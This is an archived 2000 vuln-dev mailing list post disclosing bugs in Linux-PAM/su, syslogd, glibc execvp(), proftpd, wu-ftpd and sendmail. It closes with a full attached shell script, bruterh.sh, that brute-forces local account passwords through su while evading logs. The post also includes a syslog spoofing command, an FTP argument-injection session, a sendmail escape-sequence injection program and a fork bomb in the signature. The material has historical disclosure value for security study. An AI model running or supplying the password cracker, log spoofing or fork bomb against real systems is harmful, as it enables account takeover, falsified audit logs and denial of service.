[prev in list] [next in list] [prev in thread] [next in thread]
List: vuln-dev
Subject: bruterh.sh & syslogd & [g]libc & proftpd & wu-ftpd & sendmail
From: Michal Zalewski <lcamtuf () AGS ! PL>
Date: 2000-01-23 12:47:39
[Download RAW message or body]
This post describes / demonstrates bugs in:
- Linux-PAM implementation (password cracking)
- syslogd daemon (spoofing)
- glibc execvp() function (undesirable behaviour)
- proftpd (SEGV)
- wu-ftpd (passing arbitrary parameters to three external programs)
- Sendmail (junk characters in queue)
No reason to panic.
===================
1. PAM/su on RedHat
===================
Known? Dunno. But works.
RedHat - NothingInLogs[tm] BruteForce(R) Password Crack
-------------------------------------------------------
- (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -
[+] Configured against user 'testy', wordfile: words
[+] Kill-delay set to 300000 usecs...
[+] Destination account is alive and well...
[+] /bin/su seems to be executable and setuid, hopefully it works...
[+] Let's go straight to number one...
[+] Wordfile 'words' loaded - 4 passwords...
[+] Estimated time: 0 secs, max: 1 secs.
[?] Trying 'testy' (3/4)...
[*] Huh, it worked. I've tried password 'testy' for 'testy'.
[+] Time wasted: 0 seconds.
[+] Thank You, and hope you enjoyed your stay.
=====================
2. syslogd / syslog()
=====================
Unix syslogd gets 'raw' log entries from o+w /dev/log socket, while date,
priority and so on are added by user-end library function, syslog(). Very,
very clever. Get command-line socket connectivity tool at
http://lcamtuf.hack.pl/pliki/uc.c, then try:
bash$ echo -ne 'XXX YY AA:BB:CC kernel - hax0red\0' | uc /dev/log
(ctrl+c)
Well-known? Hope so, anyway it's time to think about getpeeruid() or to
change permissions on syslog socket.
=======================
3. glibc - execvp() bug
=======================
glibc 2.0.x (dunno about other versions?) execvp() is buggy - first, it
tries execve() on given program in directories specified in PATH, but
then, if it gets ENOEXEC (executable format error), it tries to treat it
just like a shell script, calling /bin/sh -c filename. Might result in
strange/undesirable behaviour:
$ cat >'-c' <<EOF
anything
EOF
$ chmod 755 -- -c
$ cat >nic.c <<EOF
main() {
execlp("-c","call_me_jane","id",0);
}
EOF
$ gcc nic.c
$ PATH=$PATH::
$ ./a.out
uid=500(lcamtuf) gid=500(lcamtuf) groups=500(lcamtuf),2(daemon),80(network)
=====================
4. proftpd / mod_ls.c
=====================
Due to missing * in modules/mod_ls.c around line 760, pointer to another
pointer is incremented, instead of incrementing referenced pointer.
Result: SEGV. Seems to be not exploitable, as this pointer to pointer is
passed as first parameter of _parse_options function, while second
parameter to this function is hard-coded 0x80, and all we have is read
fault when isblank(*0x80) is called.
Aaah, example? Quote 'LIST X' (note: it is 'LIST(space)(space)X') while
talking to ftpd daemon on remote side.
=======================
5. wu-ftpd popen() bugs
=======================
[lcamtuf@www lcamtuf]$ ftp localhost
Connected to localhost.
220 www.XXXXX.pl FTP server (lcamtuf) ready.
Name (localhost:lcamtuf): lcamtuf
331 Password required for lcamtuf.
Password:
230 User lcamtuf logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> put "smyk" "--help"
local: smyk remote: --help
200 PORT command successful.
150 Opening BINARY mode data connection for --help.
226 Transfer complete.
321 bytes sent in 0.000243 secs (1.3e+03 Kbytes/sec)
ftp> quote site checksum "--help"
200 Usage: /bin/md5sum [OPTION] [FILE]...
ftp> ls "--version"
200 PORT command successful.
150 Opening ASCII mode data connection for /bin/ls.
ls (GNU fileutils) 3.16
226 Transfer complete.
..unfortunately, /bin/md5sum, /bin/cksum nor /bin/ls haven't any
interesting options (like: 'use external program X', or 'dump output to
file X'), and I can't see any overflows/bugs in it.
Btw. 'quote site checksum existing_file' on RedHat machines causes ftpd
daemon to hang, because there's no md5sum/cksum in /bin (but in /usr/bin
instead).
6. Sendmail and non-ascii characters in queue.
Simply, try it:
-- queue_boo.c --
main() {
printf("Type '.', then 'mailq' (works with TERM=linux).\n");
execl("/usr/sbin/sendmail",
"sendmail",
"-O",
"DeliveryMode=d",
"lp(\033[2J\033[0H\033[1m* 0WNED BOX *\033[0;30m)",
0);
}
-- EOF --
Stupid.
_______________________________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <> [AGS WAN] * [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 22 813 25 86] <=-=> [cellular phone: +48 603 110 160]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deutsch]
["bruterh.sh" (APPLICATION/X-SH)]
#!/bin/bash
# (c) 1999/2000 <lcamtuf@ids.pl>
# ------------------------------
#
# Requirements:
#
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
#
DESTACC='testy' # Account to crack
WORDFILE='words' # Wordfile with passwords to test
KILLDELAY=03 # Delay (in 1/10 sec) to wait for su (<10)
# End of setup.
clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo " - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> - "
echo
if [ ! "$1" = "" ]; then
DESTACC="$1"
fi
KD=$[KILLDELAY*100000]
echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs..."
id "$DESTACC" &>/dev/null
if [ ! "$?" = "0" ]; then
echo "[-] Hmm, user '$DESTACC' not found, paranoia?"
echo
exit 0
fi
SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"
if [ ! "$SHL" = "/bin/bash" ]; then
echo "[-] Hmm, user '$DESTACC' has $SHL set as shell, expect problems..."
fi
echo "[+] Destination account is alive and well..."
if [ ! -f "$WORDFILE" ]; then
echo "[-] Wordfile '$WORDFILE' not found, check it."
echo
exit 0
fi
if [ ! -u /bin/su ]; then
echo "[-] Can't find +s on /bin/su, hack me."
echo
exit 0
fi
if [ ! -x /bin/su ]; then
echo "[-] Haven't +x on /bin/su, hack me."
echo
exit 0
fi
echo "[+] /bin/su seems to be executable and setuid, hopefully it works..."
if [ ! -x /bin/usleep ]; then
echo "[-] No /bin/usleep in this system. Be a hacker."
echo
exit 0
fi
if [ "$UID" = "0" ]; then
echo "[-] Root?! You idiot..."
echo
exit 0
fi
echo "[+] Let's go straight to number one..."
LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0
echo "[+] Wordfile '$WORDFILE' loaded - $LNS passwords..."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."
while [ "$CNT" -lt "$LNS" ]; do
CNT=$[CNT+1]
PASS="`head -$CNT $WORDFILE|tail -1`"
echo -ne "[?] Trying '$PASS' ($CNT/$LNS)... \r"
echo "$PASS" | su "$DESTACC" &>/dev/null &
usleep $KD
kill -9 $! &>/dev/null
if [ ! "$?" = "0" ]; then
echo
echo "[*] Huh, it worked. I've tried password '$PASS' for '$DESTACC'."
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Thank You, and hope you enjoyed your stay."
echo
exit 0
fi
done
echo "[*] Hmm, end of wordfile, but no matching passwords :("
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic